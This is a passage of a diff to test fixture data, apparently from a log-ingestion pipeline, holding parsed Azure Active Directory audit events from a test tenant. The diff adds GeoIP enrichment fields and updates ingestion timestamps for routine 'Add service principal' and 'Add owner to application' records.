Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12645,6 +13437,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -12818,7 +13622,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125225400Z", + "ingested": "2021-12-14T14:48:43.176725300Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12845,6 +13649,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -13018,7 +13834,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125231900Z", + "ingested": "2021-12-14T14:48:43.176725901Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13045,6 +13861,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -13218,7 +14046,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125238800Z", + "ingested": "2021-12-14T14:48:43.176726461Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -13245,6 +14073,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -13418,7 +14258,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125243700Z", + "ingested": "2021-12-14T14:48:43.176727084Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n 